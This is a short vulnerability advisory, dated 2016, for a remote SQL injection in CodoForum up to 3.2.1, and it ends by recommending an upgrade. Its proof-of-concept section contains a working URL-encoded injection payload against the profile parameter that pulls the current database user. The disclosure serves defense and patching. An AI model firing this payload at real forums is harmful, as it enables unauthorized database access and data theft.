1. Advisory Information
========================================
Title           : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage     : https://codoforum.com/
Remotely Exploitable    : Yes
Versions Affected   : Prior to 3.2.1
Tested on       : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability       : SQL Injection (Critical/High)
Date            : 23.07.2016
Author          : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
  
  
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman
   
 
3. Description
========================================
The script that parses the request URL and displays user profile depending on
the retrieved id does not use proper input validation against SQL injection.
 
 
4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching current user database:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))
 
 
5. SOLUTION
========================================
Upgrade to the latest version v3.4 build 19